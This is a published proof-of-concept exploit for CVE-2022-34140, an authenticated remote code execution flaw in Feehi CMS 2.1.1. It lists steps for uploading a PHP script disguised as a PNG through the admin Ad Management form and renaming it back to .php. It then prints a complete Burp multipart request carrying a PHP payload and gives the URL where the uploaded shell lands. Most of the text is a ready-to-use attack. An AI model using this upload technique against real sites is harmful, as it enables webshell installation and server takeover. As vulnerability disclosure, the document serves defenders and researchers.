Feehi CMS 2.1.1 Remote Code Execution

`# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)  
# Date: 22-08-2022  
# Exploit Author: yuyudhn  
# Vendor Homepage: https://feehi.com/  
# Software Link: https://github.com/liufee/cms  
# Version: 2.1.1 (REQUIRED)  
# Tested on: Linux, Docker  
# CVE : CVE-2022-34140  
  
  
  
# Proof of Concept:  
1. Login using admin account at http://feehi-cms.local/admin  
2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex  
3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate  
4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.  
5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php  
  
# Burp request example:  
  
POST /admin/index.php?r=ad%2Fcreate HTTP/1.1  
Host: feehi-cms.local  
Content-Length: 1530  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://feehi-cms.local  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D  
  
Connection: close  
  
  
  
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg  
  
Content-Disposition: form-data; name="_csrf_backend"  
  
  
  
FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==  
  
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg  
  
Content-Disposition: form-data; name="AdForm[name]"  
  
  
  
rce  
  
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg  
  
Content-Disposition: form-data; name="AdForm[tips]"  
  
  
  
rce at Ad management  
  
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg  
  
Content-Disposition: form-data; name="AdForm[input_type]"  
  
  
  
1  
  
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg  
  
Content-Disposition: form-data; name="AdForm[ad]"  
  
  
  
  
  
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg  
  
Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"  
  
Content-Type: image/png  
  
  
  
<?php phpinfo();  
  
  
  
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg  
  
Content-Disposition: form-data; name="AdForm[link]"  
  
  
  
  
  
--------------  
  
`